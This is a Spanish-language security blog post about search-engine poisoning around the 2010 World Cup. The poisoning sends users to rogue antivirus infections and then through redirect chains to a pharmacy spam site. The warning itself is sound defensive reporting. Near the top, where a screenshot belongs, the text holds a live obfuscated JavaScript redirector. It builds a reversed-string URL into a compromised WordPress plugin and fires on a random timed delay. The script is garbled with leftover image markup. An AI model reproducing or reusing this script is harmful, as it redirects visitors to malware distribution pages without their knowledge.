El Mundial de Futbol 2010 ya te puede infectar

Hace pocos minutos hemos encontrado casos en donde si el usuario realiza búsquedas sobre el Mundial de Fútbol 2010, a realizarse en Sudáfrica a partir del próximo mes, es enviado a sitios falsos que intentan infectarlo. Es decir que ya se están utilizando técnicas de BlackHat SEO para posicionar estos sitios en un buen lugar en el buscador, de forma de infectar a millones de usuarios interesados en este evento pronto a comenzar.

Si el usuario realiza alguna búsqueda relacionada a la temática, en algunos casos recibirá como resultados sitios maliciosos, como es el caso presentado en la siguiente imagen donde los primeros cuatro resultados enlazan a páginas web creadas para propagar malware:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/wp-content/uploads/2010/05/mundial_2010_1.png”>

Nótese que si el usuario accede al la dirección URL que aparece en los resultados de búsqueda de forma manual, el mismo es direccionado al sitio web de la CNN, ya que la visita no proviene de Google:

Esta es una estrategia para dificultar la detección del sitio web malicioso, al que sólo puede llegarse a través de los resultados en los buscadores.

Y qué pasa cuando un ordenador se infecta con un FAKE AV/ROGUE:

Hace pocas horas informábamos sobre el riesgo de realizar búsquedas sobre el mundial de futbol 2010 y ahora mostraremos algunas consecuencias de una infección de este tipo.

El primer signo que el usuario nota en cualquier infección con rogue es la aparición de alertas visuales o auditivas en forma permanente sobre supuestas infecciones que son falsas pero además existen otras consecuencias menos visibles y que mostramos a continuación y que están relacionadas con las ganancias de los delincuentes.

¿Qué sucede si el usuario, luego de infectarse, realiza otra búsqueda en Internet?
Si sólo analizamos el tráfico de Internet, en la siguiente imagen se puede ver que el usuario ingresa a Google, realiza su búsqueda y al hacer clic sobre uno de los resultados, supuestamente ingresa al sitio seleccionado (tori[ELIMINADO]ville.org):

En realidad ese sitio lo conduce a http://xpgh1s.[ELIMINADO].pl y ese a otro distinto (http://ww3.coantys-55d.[ELIMINADO].pl):

Y este a otro (http://[ELIMINADO].18.192.30):

Y este finalmente a otro (http://find[ELIMINADO].com):

Este sitio dice ser un buscador pero sólo mostrará un resultado, que como es evidente nada tiene que ver con la búsqueda original sino que se trata de un sitio de venta de productos farmacéuticos.

Finalmente se puede apreciar con claridad la intención de la infección original: llevar al usuario a este tipo de sitios para que adquiera un producto, lo cual representa un ingreso de dinero para el delincuente.
__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.